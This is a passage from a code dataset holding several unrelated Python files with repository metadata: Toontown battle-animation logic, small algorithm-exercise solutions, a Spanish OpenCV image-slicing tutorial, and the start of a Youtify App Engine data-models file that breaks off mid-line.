TTLocalizer.MovieTutorialReward5, CFSpeech | CFTimeout, self.tomDialogue05), Wait(1.0), Func(self.tutorialTom.animFSM.request, 'TeleportOut'), Wait(self.tutorialTom.getDuration('teleport')), Wait(1.0), Func(self.playTutorialReward_4, 0), name='tutorial-reward-3cb'), name='tutorial-reward-3c')\n self.track1.start()\n else:\n self.playTutorialReward_4(0)\n return\n\n def playTutorialReward_4(self, value):\n base.localAvatar.setH(270)\n self.tutorialTom.removeActive()\n self.tutorialTom.delete()\n self.questList = None\n self.rewardCallback()\n return\n\n def stop(self):\n if self.track:\n self.track.finish()\n self._deleteTrack()\n if hasattr(self, 'track1'):\n self.track1.finish()\n self.track1 = None\n if hasattr(self, 'track2'):\n self.track2.finish()\n self.track2 = None\n if hasattr(self, 'track3'):\n self.track3.finish()\n self.track3 = None\n if self.rewardPanel:\n self.rewardPanel.hide()\n if self.playByPlayText:\n self.playByPlayText.hide()\n return\n\n def __doToonAttacks(self):\n if base.config.GetBool('want-toon-attack-anims', 1):\n track = Sequence(name='toon-attacks')\n camTrack = Sequence(name='toon-attacks-cam')\n ival, camIval = MovieFire.doFires(self.__findToonAttack(FIRE))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieSOS.doSOSs(self.__findToonAttack(SOS))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieNPCSOS.doNPCSOSs(self.__findToonAttack(NPCSOS))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MoviePetSOS.doPetSOSs(self.__findToonAttack(PETSOS))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n hasHealBonus = self.battle.getInteractivePropTrackBonus() == HEAL\n ival, camIval = 
MovieHeal.doHeals(self.__findToonAttack(HEAL), hasHealBonus)\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieTrap.doTraps(self.__findToonAttack(TRAP))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieLure.doLures(self.__findToonAttack(LURE))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieSound.doSounds(self.__findToonAttack(SOUND))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieThrow.doThrows(self.__findToonAttack(THROW))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieSquirt.doSquirts(self.__findToonAttack(SQUIRT))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n ival, camIval = MovieDrop.doDrops(self.__findToonAttack(DROP))\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n if len(track) == 0:\n return (None, None)\n else:\n return (track, camTrack)\n else:\n return (None, None)\n return None\n\n def genRewardDicts(self, id0, origExp0, earnedExp0, origQuests0, items0, missedItems0, origMerits0, merits0, parts0, id1, origExp1, earnedExp1, origQuests1, items1, missedItems1, origMerits1, merits1, parts1, id2, origExp2, earnedExp2, origQuests2, items2, missedItems2, origMerits2, merits2, parts2, id3, origExp3, earnedExp3, origQuests3, items3, missedItems3, origMerits3, merits3, parts3, deathList, uberList, helpfulToonsList):\n self.deathList = deathList\n self.helpfulToonsList = helpfulToonsList\n entries = ((id0,\n origExp0,\n earnedExp0,\n origQuests0,\n items0,\n missedItems0,\n origMerits0,\n merits0,\n parts0),\n (id1,\n origExp1,\n earnedExp1,\n origQuests1,\n items1,\n missedItems1,\n origMerits1,\n merits1,\n parts1),\n (id2,\n origExp2,\n earnedExp2,\n origQuests2,\n items2,\n missedItems2,\n origMerits2,\n merits2,\n parts2),\n (id3,\n origExp3,\n earnedExp3,\n origQuests3,\n items3,\n missedItems3,\n origMerits3,\n merits3,\n parts3))\n self.toonRewardDicts = BattleExperience.genRewardDicts(entries)\n self.toonRewardIds = [id0,\n id1,\n id2,\n id3]\n self.uberList = uberList\n\n def genAttackDicts(self, toons, suits, id0, tr0, le0, tg0, hp0, ac0, hpb0, kbb0, died0, revive0, id1, tr1, le1, tg1, hp1, ac1, hpb1, kbb1, died1, revive1, id2, tr2, le2, tg2, hp2, ac2, hpb2, kbb2, died2, revive2, id3, tr3, le3, tg3, hp3, ac3, hpb3, kbb3, died3, revive3, sid0, at0, stg0, dm0, sd0, sb0, st0, sid1, at1, stg1, dm1, sd1, sb1, st1, sid2, at2, stg2, dm2, sd2, sb2, st2, sid3, at3, stg3, dm3, sd3, sb3, st3):\n if self.track and self.track.isPlaying():\n self.notify.warning('genAttackDicts() - track is playing!')\n toonAttacks = ((id0,\n tr0,\n le0,\n tg0,\n hp0,\n ac0,\n hpb0,\n kbb0,\n died0,\n revive0),\n (id1,\n tr1,\n le1,\n tg1,\n hp1,\n ac1,\n hpb1,\n kbb1,\n died1,\n revive1),\n (id2,\n tr2,\n le2,\n tg2,\n hp2,\n ac2,\n hpb2,\n kbb2,\n died2,\n revive2),\n (id3,\n tr3,\n le3,\n tg3,\n hp3,\n ac3,\n hpb3,\n kbb3,\n died3,\n revive3))\n self.__genToonAttackDicts(toons, suits, toonAttacks)\n suitAttacks = ((sid0,\n at0,\n stg0,\n dm0,\n sd0,\n sb0,\n st0),\n (sid1,\n at1,\n stg1,\n dm1,\n sd1,\n sb1,\n st1),\n (sid2,\n at2,\n stg2,\n dm2,\n sd2,\n sb2,\n st2),\n (sid3,\n at3,\n stg3,\n dm3,\n sd3,\n sb3,\n st3))\n self.__genSuitAttackDicts(toons, suits, suitAttacks)\n\n def __genToonAttackDicts(self, toons, suits, toonAttacks):\n for ta in toonAttacks:\n targetGone = 0\n track = ta[TOON_TRACK_COL]\n if track != NO_ATTACK:\n adict = {}\n toonIndex = ta[TOON_ID_COL]\n toonId = toons[toonIndex]\n toon = 
self.battle.findToon(toonId)\n if toon == None:\n continue\n level = ta[TOON_LVL_COL]\n adict['toon'] = toon\n adict['track'] = track\n adict['level'] = level\n hps = ta[TOON_HP_COL]\n kbbonuses = ta[TOON_KBBONUS_COL]\n if track == NPCSOS:\n adict['npcId'] = ta[TOON_TGT_COL]\n toonId = ta[TOON_TGT_COL]\n track, npc_level, npc_hp = NPCToons.getNPCTrackLevelHp(adict['npcId'])\n if track == None:\n track = NPCSOS\n adict['track'] = track\n adict['level'] = npc_level\n elif track == PETSOS:\n petId = ta[TOON_TGT_COL]\n adict['toonId'] = toonId\n adict['petId'] = petId\n if track == SOS:\n targetId = ta[TOON_TGT_COL]\n if targetId == base.localAvatar.doId:\n target = base.localAvatar\n adict['targetType'] = 'callee'\n elif toon == base.localAvatar:\n target = base.cr.identifyAvatar(targetId)\n adict['targetType'] = 'caller'\n else:\n target = None\n adict['targetType'] = 'observer'\n adict['target'] = target\n elif track == NPCSOS or track == NPC_COGS_MISS or track == NPC_TOONS_HIT or track == NPC_RESTOCK_GAGS or track == PETSOS:\n adict['special'] = 1\n toonHandles = []\n for t in toons:\n if t != -1:\n target = self.battle.findToon(t)\n if target == None:\n continue\n if track == NPC_TOONS_HIT and t == toonId:\n continue\n toonHandles.append(target)\n\n adict['toons'] = toonHandles\n suitHandles = []\n for s in suits:\n if s != -1:\n target = self.battle.findSuit(s)\n if target == None:\n continue\n suitHandles.append(target)\n\n adict['suits'] = suitHandles\n if track == PETSOS:\n del adict['special']\n targets = []\n for t in toons:\n if t != -1:\n target = self.battle.findToon(t)\n if target == None:\n continue\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[toons.index(t)]\n self.notify.debug('PETSOS: toon: %d healed for hp: %d' % (target.doId, hps[toons.index(t)]))\n targets.append(tdict)\n\n if len(targets) > 0:\n adict['target'] = targets\n elif track == HEAL:\n if levelAffectsGroup(HEAL, level):\n targets = []\n for t in toons:\n if t != toonId and t != -1:\n target = self.battle.findToon(t)\n if target == None:\n continue\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[toons.index(t)]\n self.notify.debug('HEAL: toon: %d healed for hp: %d' % (target.doId, hps[toons.index(t)]))\n targets.append(tdict)\n\n if len(targets) > 0:\n adict['target'] = targets\n else:\n targetGone = 1\n else:\n targetIndex = ta[TOON_TGT_COL]\n if targetIndex < 0:\n targetGone = 1\n else:\n targetId = toons[targetIndex]\n target = self.battle.findToon(targetId)\n if target != None:\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[targetIndex]\n adict['target'] = tdict\n else:\n targetGone = 1\n elif attackAffectsGroup(track, level, ta[TOON_TRACK_COL]):\n targets = []\n for s in suits:\n if s != -1:\n target = self.battle.findSuit(s)\n if ta[TOON_TRACK_COL] == NPCSOS:\n if track == LURE and self.battle.isSuitLured(target) == 1:\n continue\n elif track == TRAP and (self.battle.isSuitLured(target) == 1 or target.battleTrap != NO_TRAP):\n continue\n targetIndex = suits.index(s)\n sdict = {}\n sdict['suit'] = target\n sdict['hp'] = hps[targetIndex]\n if ta[TOON_TRACK_COL] == NPCSOS and track == DROP and hps[targetIndex] == 0:\n continue\n sdict['kbbonus'] = kbbonuses[targetIndex]\n sdict['died'] = ta[SUIT_DIED_COL] & 1 << targetIndex\n sdict['revived'] = ta[SUIT_REVIVE_COL] & 1 << targetIndex\n if sdict['died'] != 0:\n pass\n sdict['leftSuits'] = []\n sdict['rightSuits'] = []\n targets.append(sdict)\n\n adict['target'] = targets\n else:\n targetIndex = ta[TOON_TGT_COL]\n if targetIndex 
< 0:\n targetGone = 1\n else:\n targetId = suits[targetIndex]\n target = self.battle.findSuit(targetId)\n sdict = {}\n sdict['suit'] = target\n if self.battle.activeSuits.count(target) == 0:\n targetGone = 1\n suitIndex = 0\n else:\n suitIndex = self.battle.activeSuits.index(target)\n leftSuits = []\n for si in range(0, suitIndex):\n asuit = self.battle.activeSuits[si]\n if self.battle.isSuitLured(asuit) == 0:\n leftSuits.append(asuit)\n\n lenSuits = len(self.battle.activeSuits)\n rightSuits = []\n if lenSuits > suitIndex + 1:\n for si in range(suitIndex + 1, lenSuits):\n asuit = self.battle.activeSuits[si]\n if self.battle.isSuitLured(asuit) == 0:\n rightSuits.append(asuit)\n\n sdict['leftSuits'] = leftSuits\n sdict['rightSuits'] = rightSuits\n sdict['hp'] = hps[targetIndex]\n sdict['kbbonus'] = kbbonuses[targetIndex]\n sdict['died'] = ta[SUIT_DIED_COL] & 1 << targetIndex\n sdict['revived'] = ta[SUIT_REVIVE_COL] & 1 << targetIndex\n if sdict['revived'] != 0:\n pass\n if sdict['died'] != 0:\n pass\n if track == DROP or track == TRAP:\n adict['target'] = [sdict]\n else:\n adict['target'] = sdict\n adict['hpbonus'] = ta[TOON_HPBONUS_COL]\n adict['sidestep'] = ta[TOON_ACCBONUS_COL]\n if 'npcId' in adict:\n adict['sidestep'] = 0\n adict['battle'] = self.battle\n adict['playByPlayText'] = self.playByPlayText\n if targetGone == 0:\n self.toonAttackDicts.append(adict)\n else:\n self.notify.warning('genToonAttackDicts() - target gone!')\n\n def compFunc(a, b):\n alevel = a['level']\n blevel = b['level']\n if alevel > blevel:\n return 1\n elif alevel < blevel:\n return -1\n return 0\n\n self.toonAttackDicts.sort(key=functools.cmp_to_key(compFunc))\n return\n\n def __findToonAttack(self, track):\n setCapture = 0\n tp = []\n for ta in self.toonAttackDicts:\n if ta['track'] == track or track == NPCSOS and 'special' in ta:\n tp.append(ta)\n if track == SQUIRT:\n setCapture = 1\n\n if track == TRAP:\n sortedTraps = []\n for attack in tp:\n if 'npcId' not in attack:\n sortedTraps.append(attack)\n\n for attack in tp:\n if 'npcId' in attack:\n sortedTraps.append(attack)\n\n tp = sortedTraps\n if setCapture:\n pass\n return tp\n\n def __genSuitAttackDicts(self, toons, suits, suitAttacks):\n for sa in suitAttacks:\n targetGone = 0\n attack = sa[SUIT_ATK_COL]\n if attack != NO_ATTACK:\n suitIndex = sa[SUIT_ID_COL]\n suitId = suits[suitIndex]\n suit = self.battle.findSuit(suitId)\n if suit == None:\n self.notify.error('suit: %d not in battle!' 
% suitId)\n adict = getSuitAttack(suit.getStyleName(), suit.getLevel(), attack)\n adict['suit'] = suit\n adict['battle'] = self.battle\n adict['playByPlayText'] = self.playByPlayText\n adict['taunt'] = sa[SUIT_TAUNT_COL]\n hps = sa[SUIT_HP_COL]\n if adict['group'] == ATK_TGT_GROUP:\n targets = []\n for t in toons:\n if t != -1:\n target = self.battle.findToon(t)\n if target == None:\n continue\n targetIndex = toons.index(t)\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[targetIndex]\n self.notify.debug('DAMAGE: toon: %d hit for hp: %d' % (target.doId, hps[targetIndex]))\n toonDied = sa[TOON_DIED_COL] & 1 << targetIndex\n tdict['died'] = toonDied\n targets.append(tdict)\n\n if len(targets) > 0:\n adict['target'] = targets\n else:\n targetGone = 1\n elif adict['group'] == ATK_TGT_SINGLE:\n targetIndex = sa[SUIT_TGT_COL]\n targetId = toons[targetIndex]\n target = self.battle.findToon(targetId)\n if target == None:\n targetGone = 1\n break\n tdict = {}\n tdict['toon'] = target\n tdict['hp'] = hps[targetIndex]\n self.notify.debug('DAMAGE: toon: %d hit for hp: %d' % (target.doId, hps[targetIndex]))\n toonDied = sa[TOON_DIED_COL] & 1 << targetIndex\n tdict['died'] = toonDied\n toonIndex = self.battle.activeToons.index(target)\n rightToons = []\n for ti in range(0, toonIndex):\n rightToons.append(self.battle.activeToons[ti])\n\n lenToons = len(self.battle.activeToons)\n leftToons = []\n if lenToons > toonIndex + 1:\n for ti in range(toonIndex + 1, lenToons):\n leftToons.append(self.battle.activeToons[ti])\n\n tdict['leftToons'] = leftToons\n tdict['rightToons'] = rightToons\n adict['target'] = tdict\n else:\n self.notify.warning('got suit attack not group or single!')\n if targetGone == 0:\n self.suitAttackDicts.append(adict)\n else:\n self.notify.warning('genSuitAttackDicts() - target gone!')\n\n return\n\n def __doSuitAttacks(self):\n if base.config.GetBool('want-suit-anims', 1):\n track = Sequence(name='suit-attacks')\n camTrack = Sequence(name='suit-attacks-cam')\n isLocalToonSad = False\n for a in self.suitAttackDicts:\n ival, camIval = MovieSuitAttacks.doSuitAttack(a)\n if ival:\n track.append(ival)\n camTrack.append(camIval)\n targetField = a.get('target')\n if targetField is None:\n continue\n if a['group'] == ATK_TGT_GROUP:\n for target in targetField:\n if target['died'] and target['toon'].doId == base.localAvatar.doId:\n isLocalToonSad = True\n\n elif a['group'] == ATK_TGT_SINGLE:\n if targetField['died'] and targetField['toon'].doId == base.localAvatar.doId:\n isLocalToonSad = True\n if isLocalToonSad:\n break\n\n if len(track) == 0:\n return (None, None)\n return (track, camTrack)\n else:\n return (None, None)\n return\n","repo_name":"open-toontown/open-toontown","sub_path":"toontown/battle/Movie.py","file_name":"Movie.py","file_ext":"py","file_size_in_byte":37134,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"84"} +{"seq_id":"37679730592","text":"counter = int(input())\nnum = 0\nd = {}\nwhile counter > num:\n num += 1\n inp = input()\n if inp == '0':\n for i in range(2):\n if i == 0:\n theme = input()\n d[num] = theme\n else:\n input()\n else:\n d[num] = int(inp)\n input()\n\n\ndef find(key):\n if type(key) == str:\n return key\n else:\n return find(d[key])\n\n\nsum_dic = {}\n\nfor value in d.values():\n if type(value) == str and value not in sum_dic.keys():\n sum_dic[value] = 1\n else:\n val = find(value)\n sum_dic[val] += 1\n\nsum_dic_list = sorted([(value, key) for key, value in sum_dic.items()], reverse=True)\nmax_el = 
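[editor's note] A small simplification note on the Movie.py record above: compFunc in __genToonAttackDicts compares only the 'level' field, so routing it through functools.cmp_to_key is unnecessary; a plain key function gives the same stable ascending order. Illustrative standalone sketch:

from operator import itemgetter

attacks = [{'level': 3}, {'level': 1}, {'level': 2}]
# Same ordering as sort(key=functools.cmp_to_key(compFunc)) in the original:
# ascending on 'level', with sort stability preserving the order of ties.
attacks.sort(key=itemgetter('level'))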
sum_dic_list[0][0]\n\nmax_list = []\n\nfor key, value in sum_dic.items():\n if value == max_el:\n max_list.append(key)\n\nresult = []\n\nfor key, value in d.items():\n if value in max_list:\n result.append(key)\nprint(d[min(result)])","repo_name":"Constanter/yandex_algorithm_training","sub_path":"homework_4/E_forum.py","file_name":"E_forum.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"39515198290","text":"# The question for this solution can be found at https://www.hackerrank.com/challenges/minimum-distances/problem\n\ndef minimumDistances(a):\n\tminValues = []\n\t\n\tfor i in range(len(a) - 1):\n\t\tfor j in range(i + 1, len(a)):\n\t\t\tif a[j] == a[i]:\n\t\t\t\tminValues.append(abs(j-i))\n\t\t\t\tbreak\n\t\n\tif len(minValues) == 0:\n\t\treturn -1\n\treturn min(minValues)\n\t\na = list(map(int, input().rstrip().split()))\nprint(minimumDistances(a))","repo_name":"pranavj1001/CompetitiveProgramming","sub_path":"Python/minimumDistances.py","file_name":"minimumDistances.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"84"} +{"seq_id":"2116459241","text":"import cv2\r\nimport numpy as np\r\n\r\nimagenObscura = np.zeros((100,100,3), np.uint8) #Creamos una matriz de 3 dimensiones y la llenamos con ceros \r\n#(100,100,3) -> Imagen de 100 x 100 con 3 canales \r\n\r\npixel = imagenObscura[97,97] #Obtenemos el valor del pixel en la posicion 97,97 de la matriz general \r\n\"\"\"Nos devuelve un vector de 3 elementos \"\"\"\r\nprint(pixel) #Imprimimos el valor del pixel\r\n\r\nimagenObscura[30,60] = [255, 255, 255] #Reemplazamos el valor del pixel en la posicon 97, 97 y lo hacemos de color blanco \r\npixel = imagenObscura[30,60]\r\nprint(pixel) \r\n\r\n\"\"\"Obtener las dimensiones de la imagen generada, utilizaremos la funcion shape\"\"\" \r\nalto, largo, canales = imagenObscura.shape\r\nprint(alto, largo, canales)\r\n\r\n\"\"\"Recorremos la imagen imprimiendo los valores de cada pixel\"\"\"\r\nfor i in range(largo):\r\n for j in range(alto):\r\n print(imagenObscura[i,j])\r\n\r\n\"\"\"Modificar los valores de cada pixel\"\"\"\r\nfor i in range(largo):\r\n for j in range(alto):\r\n pixel = imagenObscura[i,j]\r\n if pixel[0] == 0 and pixel[1] == 0 and pixel[2] == 0:\r\n imagenObscura[i,j] = [0,255,230]\r\n\r\ncv2.namedWindow(\"block\", cv2.WINDOW_NORMAL)\r\ncv2.imshow(\"block\", imagenObscura)\r\n\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n\r\n\"\"\" APLICAR SLICING A LISTAS Y VECTORES \"\"\"\r\nlista = [1,2,8,9,5,1,6,56,4,8]\r\n\r\nfor elemento in lista:\r\n print(elemento)\r\n\r\nprint(lista[:]) #Muestra toda la lista \r\nprint (lista[0:]) #Muestra toda la lista desde la posicion 0 hasta el final\r\nprint((lista[5:])) #Muestra la lista desde la posicion 5 hasta el final\r\nprint(lista[::-1]) #Muestra toda la lista de forma descendente \r\n\r\nlista[5:] = [1,1,1,1,1,1]\r\nprint(lista) #Muestra toda lista y despues de la posicion 5 reemplaza los valores por '1'\r\n\r\nlista[:] = [1,1,1,1,1,1]\r\nprint(lista)\r\nprint(lista[5:9])\r\n\r\n\"\"\"TRABAJANDO CON LA IMAGEN CANDADOS.JPG\"\"\"\r\npath = r'C:\\Users\\User\\Desktop\\PDI\\opencv\\candados.jpg'\r\nimg =cv2.imread(path) #Leemos la imagen de entrada y la guardamos en la variable img\r\nalto, largo, _ = img.shape #Obtenemos las dimensiones de la imagen \r\nprint(alto,largo) #Imprimimos sus dimensiones \r\n\r\n#Extraemos la imagen del candado 
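[editor's note] find() in the E_forum record above recurses through parent ids until it reaches a theme string; a reply chain deeper than Python's default recursion limit (1000) would crash it. An iterative equivalent with memoization — d is the same id-to-parent-or-theme mapping built above, while find_root and the cache argument are new names for illustration:

def find_root(key, d, cache):
    """Iterative version of find(): follow parent ids in d until a theme string."""
    path = []
    while not isinstance(key, str):
        if key in cache:          # this id was already resolved earlier
            key = cache[key]
            break
        path.append(key)
        key = d[key]
    for k in path:                # path compression: remember the root for each id
        cache[k] = key
    return key

# usage: cache = {}; theme = find_root(value, d, cache)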
1\r\ncandado1 = img[0:alto, 0:int(largo/2)] #Obtenemos los pixeles comprendidos desde 0 al total del alto de la imagen \r\n# y asu vez hasta la mitad del largo de la misma.\r\ncandado2 = img[0:alto, int(largo/2):] #Obtenemos los pixeles comprendidos desde 0 al total del alto de la imagen \r\n# y asi vez desde la mitad del largo de la misma hasta el final del largo\r\n\r\n#Generamos la imagen compuesta con las mismas dimensiones que la original y la rellenamos con ceros \r\nimagenCompuesta = np.zeros((alto, largo, 3), np.uint8)\r\n#Rellenamos la imagen \r\nimagenCompuesta[0:alto, 0:int(largo/2)] = candado2 #Reemplazamos los pixeles de la primer mitad con la imagen del candado2 \r\nimagenCompuesta[0:alto, int(largo/2):] = candado1 #Reemplazamos los pixeles de la segunda mitad con la imagen del candado1\r\n\r\ncv2.namedWindow(\"Original\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"candado1\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"candado2\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"Imagen Compuesta\", cv2.WINDOW_NORMAL)\r\n\r\ncv2.imshow(\"Original\", img)\r\ncv2.imshow(\"candado1\", candado1)\r\ncv2.imshow(\"candado2\", candado2)\r\ncv2.imshow(\"Imagen Compuesta\", imagenCompuesta)\r\n\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n\r\n\"\"\"TRABAJANDO CON EL COMANDO SELECT ROI\"\"\"\r\npath = r'C:\\Users\\User\\Desktop\\PDI\\opencv\\candados.jpg'\r\nimg =cv2.imread(path) #Leemos la imagen de entrada y la guardamos en la variable img\r\nimgCopy = img.copy()\r\n\r\nalto, largo, canales = img.shape\r\n\r\ncv2.namedWindow(\"ROI\", cv2.WINDOW_NORMAL)\r\n\r\nroi1 = cv2.selectROI(\"ROI\", img)\r\nprint(roi1)\r\n\r\ncandado1 = img[int(roi1[1]) : int(roi1[1]+roi1[3]), int(roi1[0]) : int(roi1[0]+roi1[2])]\r\nalto1, largo1, _ = candado1.shape\r\nroi2 = cv2.selectROI(\"ROI\", img)\r\nprint(roi2)\r\n\r\ncandado2 = img[int(roi2[1]) : int(roi2[1]+roi2[3]), int(roi2[0]) : int(roi2[0]+roi2[2])]\r\nalto2, largo2, _ = candado2.shape\r\n\r\nnewCandado1 = cv2.resize(candado1, (largo2, alto2))\r\nnewCandado2 = cv2.resize(candado2, (largo1, alto1))\r\n\r\nimgCopy[int(roi1[1]) : int(roi1[1]+ roi1[3]), int(roi1[0]) : int(roi1[0]+ roi1[2])] = newCandado2\r\nimgCopy[int(roi2[1]) : int(roi2[1]+ roi2[3]), int(roi2[0]) : int(roi2[0]+ roi2[2])] = newCandado1 \r\n \r\n\r\ncv2.namedWindow(\"original\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"candado1\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"candado2\", cv2.WINDOW_NORMAL)\r\ncv2.namedWindow(\"imgCompuesta\", cv2.WINDOW_NORMAL)\r\n\r\ncv2.imshow(\"original\", img)\r\ncv2.imshow(\"candado1\", candado1)\r\ncv2.imshow(\"candado2\", candado2)\r\ncv2.imshow(\"imgCompuesta\", imgCopy)\r\n\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n","repo_name":"alejandradelacruz/PDI","sub_path":"opencv/pixeles.py","file_name":"pixeles.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"8228373354","text":"import logging\nimport os\nimport random\nimport urllib\nimport hashlib\nfrom google.appengine.ext import db\nfrom google.appengine.api import users\nfrom time import mktime\n\nclass ExternalUser(db.Model):\n type = db.StringProperty(required=True)\n external_user_id = db.StringProperty(required=True)\n username = db.StringProperty()\n avatar_url = db.StringProperty()\n subscribers = db.ListProperty(db.Key)\n nr_of_subscribers = db.IntegerProperty(default=0)\n last_updated = db.DateTimeProperty(auto_now_add=True)\n get_last_updated = db.BooleanProperty(default=True)\n last_checked 
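[editor's note] Two notes on the pixeles.py tutorial record above. First, NumPy image indexing is [row, column] — that is, [y, x] — so loops written as range(largo) by range(alto) only behave because the test image happens to be square. Second, the per-pixel recoloring loop is slow in pure Python and can be a single vectorized assignment, for example:

import numpy as np

img = np.zeros((100, 100, 3), np.uint8)   # alto x largo x channels

# Boolean mask of pure-black pixels, then one fancy-indexed assignment --
# the same effect as the nested loops that set [0, 255, 230].
mask = np.all(img == 0, axis=-1)
img[mask] = (0, 255, 230)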
= db.DateTimeProperty(auto_now_add=True)\n\nclass YoutifyUser(db.Model):\n created = db.DateTimeProperty(auto_now_add=True)\n last_login = db.DateTimeProperty()\n device = db.StringProperty()\n\n google_user = db.UserProperty()\n google_user2 = db.UserProperty()\n lastfm_user_name = db.StringProperty()\n lastfm_access_token = db.StringProperty()\n lastfm_scrobble_automatically = db.BooleanProperty(default=True)\n youtube_username = db.StringProperty()\n dropbox_access_token = db.StringProperty()\n dropbox_user_name = db.StringProperty()\n\n nickname = db.StringProperty()\n nickname_lower = db.StringProperty()\n first_name = db.StringProperty()\n last_name = db.StringProperty()\n tagline = db.StringProperty()\n playlists = db.ListProperty(db.Key)\n playlist_subscriptions = db.ListProperty(db.Key)\n last_notification_seen_timestamp = db.StringProperty()\n external_user_subscriptions = db.ListProperty(db.Key)\n nr_of_followers = db.IntegerProperty(default=0)\n nr_of_followings = db.IntegerProperty(default=0)\n migrated_playlists = db.BooleanProperty(default=False)\n\n last_emailed = db.DateTimeProperty()\n send_new_follower_email = db.BooleanProperty(default=True)\n send_new_subscriber_email = db.BooleanProperty(default=True)\n\n region = db.StringProperty()\n country = db.StringProperty()\n city = db.StringProperty()\n latlon = db.StringProperty()\n\nclass FollowRelation(db.Model):\n \"\"\" user1 follows user2 \"\"\"\n user1 = db.IntegerProperty()\n user2 = db.IntegerProperty()\n\nclass Activity(db.Model):\n \"\"\"\n Loosely follows the http://activitystrea.ms standard\n\n From the spec:\n\n \"In its simplest form, an activity consists of an actor, a verb, an\n object, and a target.\"\n\n Implemented activities:\n\n actor signed up\n actor subscribed to \n actor followed \n \"\"\"\n owner = db.ReferenceProperty(reference_class=YoutifyUser)\n timestamp = db.DateTimeProperty(auto_now_add=True)\n verb = db.StringProperty()\n actor = db.TextProperty()\n type = db.StringProperty()\n target = db.TextProperty()\n\nclass Playlist(db.Model):\n owner = db.ReferenceProperty(reference_class=YoutifyUser)\n json = db.TextProperty()\n private = db.BooleanProperty(default=False)\n tracks_json = db.TextProperty()\n title = db.StringProperty()\n followers = db.ListProperty(db.Key)\n nr_of_followers = db.IntegerProperty(default=0)\n favorite = db.BooleanProperty(default=False)\n\nclass PingStats(db.Model):\n date = db.DateTimeProperty(auto_now_add=True)\n pings = db.IntegerProperty(required=True)\n\nclass ExternalUserTimestamp(db.Model):\n external_user = db.ReferenceProperty(reference_class=ExternalUser)\n user = db.ReferenceProperty(reference_class=YoutifyUser)\n last_viewed = db.DateTimeProperty()\n\nclass AlternativeTrack(db.Model):\n track_id = db.StringProperty(required=True)\n track_type = db.StringProperty(required=True)\n replacement_for_id = db.StringProperty(required=True)\n replacement_for_type = db.StringProperty(required=True)\n vote = db.IntegerProperty(required=True)\n\n\n# HELPERS\n##############################################################################\n\ndef get_current_youtify_user_model():\n return get_youtify_user_model_for(users.get_current_user())\n\ndef get_youtify_user_model_for(user=None):\n return YoutifyUser.all().filter('google_user2 = ',user).get()\n\ndef get_youtify_user_model_by_nick(nick=None):\n return YoutifyUser.all().filter('nickname_lower = ', nick.lower()).get()\n\ndef get_youtify_user_model_by_id_or_nick(id_or_nick):\n if id_or_nick.isdigit():\n return 
YoutifyUser.get_by_id(int(id_or_nick))\n else:\n return get_youtify_user_model_by_nick(id_or_nick)\n\ndef create_youtify_user_model():\n m = YoutifyUser(google_user2=users.get_current_user(), device=str(random.random()), migrated_playlists=True)\n m.put()\n\n from activities import create_signup_activity # hack to avoid recursive dependency\n create_signup_activity(m)\n\n return m\n\ndef get_followings_for_youtify_user_model(youtify_user_model):\n ret = []\n for follow_relation_model in FollowRelation.all().filter('user1 =', youtify_user_model.key().id()):\n user = YoutifyUser.get_by_id(follow_relation_model.user2)\n ret.append(get_youtify_user_struct(user))\n return ret\n\ndef get_followers_for_youtify_user_model(youtify_user_model):\n ret = []\n for follow_relation_model in FollowRelation.all().filter('user2 =', youtify_user_model.key().id()):\n user = YoutifyUser.get_by_id(follow_relation_model.user1)\n ret.append(get_youtify_user_struct(user))\n return ret\n\ndef get_youtify_user_struct(youtify_user_model, include_private_data=False):\n if youtify_user_model.google_user2:\n email = youtify_user_model.google_user2.email()\n else:\n email = youtify_user_model.google_user.email()\n\n gravatar_email = email\n default_image = 'http://' + os.environ['HTTP_HOST'] + '/images/user.png'\n small_size = 64\n large_size = 208\n user = {\n 'id': str(youtify_user_model.key().id()),\n 'email': None,\n 'lastfm_user_name': youtify_user_model.lastfm_user_name,\n 'dropbox_user_name': youtify_user_model.dropbox_user_name,\n 'displayName': get_display_name_for_youtify_user_model(youtify_user_model),\n 'nr_of_followers': youtify_user_model.nr_of_followers,\n 'nr_of_followings': youtify_user_model.nr_of_followings,\n 'nr_of_playlists': len(youtify_user_model.playlists) + len(youtify_user_model.playlist_subscriptions),\n 'nickname': youtify_user_model.nickname,\n 'firstName': youtify_user_model.first_name,\n 'lastName': youtify_user_model.last_name,\n 'tagline': youtify_user_model.tagline,\n 'smallImageUrl': \"http://www.gravatar.com/avatar/\" + hashlib.md5(gravatar_email.lower()).hexdigest() + \"?\" + urllib.urlencode({'d':default_image, 's':str(small_size)}),\n 'largeImageUrl': 